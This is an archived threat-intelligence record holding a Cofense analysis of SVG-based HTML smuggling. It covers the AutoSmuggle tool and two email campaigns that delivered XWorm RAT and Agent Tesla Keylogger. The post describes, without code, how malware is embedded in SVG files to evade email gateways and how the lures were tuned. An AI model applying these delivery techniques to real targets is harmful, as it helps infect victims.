{
	"id": "6033031e-785a-4170-ad17-d335bcdd80a6",
	"created_at": "2026-04-06T00:14:23.240198Z",
	"updated_at": "2026-04-10T03:21:41.819162Z",
	"deleted_at": null,
	"sha1_hash": "b3991732a58c9bb0a6fdfce5099066e92817f5a4",
	"title": "SVG Files Abused in Emerging Campaigns",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 950032,
	"plain_text": "SVG Files Abused in Emerging Campaigns\r\nArchived: 2026-04-05 20:33:55 UTC\r\nBy: Max Gannon\r\nScalable Vector Graphic files, or SVG files, are image files that have become an advanced tactic for malware\r\ndelivery that has greatly evolved over time. The use of SVG files to deliver malware was made even easier when\r\nthe tool AutoSmuggle, a program used to deliver malicious files embedded in HTML or SVG content, was\r\nreleased in May 2022. \r\nThreat actors have recently started to extensively exploit AutoSmuggle in 2 unique campaigns starting in\r\nDecember 2023 and January 2024.\r\nMain Takeaways \r\nSVG files have been used to deliver malware at scale as early as 2015. \r\nSVG files have been used to deliver many types of malware (including Ursnif and QakBot) and even\r\nfunction as part of CVEs. \r\nDifferent forms of HTML smuggling techniques were used with SVG files for some time. \r\nThe tool AutoSmuggle (published in 2022) was created to simplify the process of using SVG files to\r\ndeliver malware. \r\nTwo recent campaigns appeared to use AutoSmuggle to deliver malware. \r\nDecember 2023 campaign delivered XWorm RAT and is ongoing. \r\nThese campaigns made up 30% of XWorm RAT campaigns seen during this time. \r\nJanuary 2024 campaign delivered Agent Tesla Keylogger and lasted until mid-February. \r\nThese campaigns made up 5% of Agent Tesla Keylogger campaigns seen during this time. \r\nFirst Uses and Notable Uses \r\nThe first major incident was in 2015, when SVG files were used to deliver Ransomware. In this case, the SVG\r\nfiles used embedded content to download malicious files, which the victim was then required to interact with.\r\nCofense first observed SVG files being used to deliver malicious content via URLs in January 2017 when they\r\nwere used to download Ursnif. \r\nThe next major usage of SVG files for malware delivery at scale was in 2022, when they were used to deliver .zip\r\narchives embedded in the SVG files. These archives contained malware that was used to deliver QakBot. This\r\nusage of SVG files containing embedded objects via HTML smuggling was different from previous SVG files,\r\nwhich only downloaded content from an external source when opened.\r\nThe following major usage of SVG files included the chaining of an exploit (CVE-2023-5631) with the smuggling\r\ncapabilities of the file format to achieve access to Roundcube servers. More recently SVG files have been used in\r\ntwo separate campaigns: one delivering Agent Tesla Keylogger and the other delivering XWorm RAT. \r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 1 of 9\n\nThe different tactics utilized in each of these campaigns along with the usage of SVG files demonstrates how\r\nversatile SVG files are. \r\nFigure 1: Infection chain of notable SVG file delivery campaigns. \r\nAutoSmuggle Tool \r\nAutoSmuggle was uploaded on GitHub in May of 2022. This tool takes a file such as an exe or an archive and\r\n“smuggles” it into the SVG or HTML file so that when the SVG or HTML file is opened, the “smuggled” file is\r\ndelivered. The brief description of AutoSmuggle from the GitHub page can be seen in Figure 2. \r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 2 of 9\n\nFigure 2: AutoSmuggle is an open-source tool that threat actors can easily abuse.\r\nIn this context, “smuggling” refers to a method of taking a malicious file and bypassing Secure Email Gateways\r\n(SEGs) and other network defenses to deliver the malicious file to the victim. If a malicious file was not\r\n“smuggled” but was instead directly attached to an email, it would be scanned, its contents would likely be\r\ndetected, and the email would be quarantined. \r\nThreat actors seek to avoid this by disguising the malicious files as legitimate HTML content. Once the malicious\r\ncontent is successfully “smuggled” past the SEG and victims open the HTML/SVG file, the malicious content is\r\ndecrypted and delivered. There are many different ways to smuggle files via HTML/SVG. The method most\r\ncommonly used in the emerging campaign was .zip archives embedded in SVG files. An example of a .zip archive\r\nembedded into an SVG file with AutoSmuggle can be seen in Figure 3.\r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 3 of 9\n\nFigure 3: Example contents of an SVG file generated by AutoSmuggle. \r\nThe method of smuggling used by AutoSmuggle (base64ToArrayBuffer) is one of the 9 commonly seen types\r\ndescribed in our Strategic Analysis “HTML Smuggling of Malware and QakBot”.\r\nTypes Of Usage \r\nThere are 2 primary ways that content embedded in SVG files can be used to deliver malware. Regardless of the\r\nmethod used, when the SVG file is opened in a browser, the browser will likely show that a file has been\r\ndownloaded. \r\nJavaScript Direct Download \r\nThe first usage of SVG files to deliver malware was via embedded URLs. When opened, the contents of the\r\noriginal 2015 SVG file, an example shown in Figure 4, were used to download a payload. \r\nFigure 4: First-generation SVG file contents downloading an archive from an external source. \r\nThe later SVG files, such as the ones in the 2017 campaign looked like Figure 5 and displayed an image when\r\nopened, as seen in Figure 6, in order to distract the victim and make it more likely that they would interact with\r\nthe downloaded file.\r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 4 of 9\n\nFigure 5: Next generation SVG file contents downloading a file from an external source and displaying an image. \r\nFigure 6: Next generation SVG file image displayed on opening. \r\nIn both the 2015 and 2017 campaigns the SVG files downloaded malicious content from external sources rather\r\nthan smuggling it as embedded content. \r\nHTML Style Embedded Object\r\nSVG files using HTML-style smuggling techniques were introduced later on, and rather than relying on external\r\nresources they would deliver embedded malicious files when opened. An example of this can be seen in Figure 3\r\nabove. These files do not typically display an image when opened; instead, they rely on the victim’s curiosity to\r\nprompt them to engage with the delivered file. \r\nThe reason threat actors use SVG files is that other than the uniqueness of the file type and extension, SVG files\r\nare treated with less suspicion than HTML files or archives. In fact, SVG files are often treated as image files\r\nrather than files containing commands. That means it is easier to “smuggle” a file inside an SVG than to\r\n“smuggle” it inside an HTML file or deliver it directly in an attachment. \r\nAgent Tesla Campaign\r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 5 of 9\n\nFigure 7: Infection chain of Agent Tesla Keylogger campaign. \r\nEmail Details \r\nThe campaigns utilizing SVG files to deliver Agent Tesla Keylogger were consistent in their infection chain. The\r\nemails each had an attached SVG file which, when opened, would deliver an embedded .zip archive. The archive\r\ncontained a JavaScript file, which would download a series of payloads, starting with a payload hosted on\r\nBlogSpot, before decoding several of the payloads and running Agent Tesla Keylogger. \r\nFigure 8: Email delivering an attached SVG file that initiates a chain to deliver Agent Tesla Keylogger. \r\nWhere Used SVGs Diverge from AutoSmuggle \r\nIn order to compare the attached SVG files to what an AutoSmuggle version would look like, the .zip archive\r\ndropped by the attached SVG file was used to generate a sample SVG file using AutoSmuggle which can be seen\r\nin Figure 3. The SVG files used in the Agent Tesla Keylogger campaigns differed in two key places from the\r\nsample SVG file generated using AutoSmuggle. The first key is on line 2 where the sample file generated from\r\nAutoSmuggle (shown in Figure 3) has a line of code generating the image seen in Figure 12. \r\nThe second key place is the section in Figure 9 beginning with the comment “Redirect after a delay”. The section\r\nafter this comment redirects the browser to the Maersk webpage. This ensures that when the file is downloaded, it\r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 6 of 9\n\nappears to be coming from Maersk rather than from a file. \r\nBy removing the extraneous red circle and replacing it with the Maersk webpage, threat actors are better able to\r\ntrick victims into interacting with the downloaded file. The fact that only 2 sections were altered indicates that the\r\nthreat actors used the AutoSmuggle tool and then slightly improved it. \r\nFigure 9: Contents of an SVG file delivering an archive when opened.\r\nXWorm RAT Campaign \r\nFigure 10: Infection chain of XWorm RAT campaigns. \r\nEmail Details \r\nThe campaigns utilizing SVG files to deliver XWorm RAT were consistent in their theme but not in their infection\r\nchain. There were three distinct infection chains. The first had an attached PDF file with an embedded link. The\r\nembedded link downloaded an SVG file which dropped an embedded .zip archive when it was opened. The\r\narchive contained a VBS file which downloaded a series of payloads from free file hosting services before running\r\nXWorm RAT and relevant files. \r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 7 of 9\n\nThe second, seen in Figure 11, had an embedded link that downloaded an SVG file that dropped an embedded .zip\r\narchive when it was opened. The archive contained a WSF script that downloaded a series of payloads before\r\nrunning XWorm RAT. \r\nThe third and final infection chain had an attached SVG, which when opened, would deliver a .zip archive. The\r\narchive contained a VBS file, which would download a series of payloads from free file hosting services before\r\nXWorm RAT and relevant files. \r\nFigure 11: Email delivering an SVG file via an embedded URL while initiates a chain to deliver XWorm RAT.\r\nWhere Used SVGs Diverge from AutoSmuggle \r\nThe SVG files used to deliver XWorm RAT had only one key difference between them and the AutoSmuggle\r\ngenerated versions for the same .zip archive payload; line 2 in Figure 3 (which is the sample file generated from\r\nAutoSmuggle). This line is used to generate the image seen in Figure 12 and it is removed from all SVG files used\r\nin these campaigns to deliver malware. \r\nIn the SVG files used to deliver Agent Tesla Keylogger, this removal was paired with a redirect that made the .zip\r\ndownload appear from Maersk. In the SVG files used to deliver XWorm RAT a blank page is displayed. While\r\nthis blank page may appear less interesting, or at least more legitimate, than a red dot, it is unclear why the threat\r\nactors behind the XWorm RAT campaigns put forth less effort than those behind the Agent Tesla Keylogger\r\ncampaigns and did not include some kind of legitimate image or redirect. \r\nFigure 12: Image automatically added to AutoSmuggle SVG files.  \r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 8 of 9\n\nSource: https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nhttps://cofense.com/blog/svg-files-abused-in-emerging-campaigns/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://cofense.com/blog/svg-files-abused-in-emerging-campaigns/"
	],
	"report_names": [
		"svg-files-abused-in-emerging-campaigns"
	],
	"threat_actors": [],
	"ts_created_at": 1775434463,
	"ts_updated_at": 1775791301,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b3991732a58c9bb0a6fdfce5099066e92817f5a4.pdf",
		"text": "https://archive.orkl.eu/b3991732a58c9bb0a6fdfce5099066e92817f5a4.txt",
		"img": "https://archive.orkl.eu/b3991732a58c9bb0a6fdfce5099066e92817f5a4.jpg"
	}
}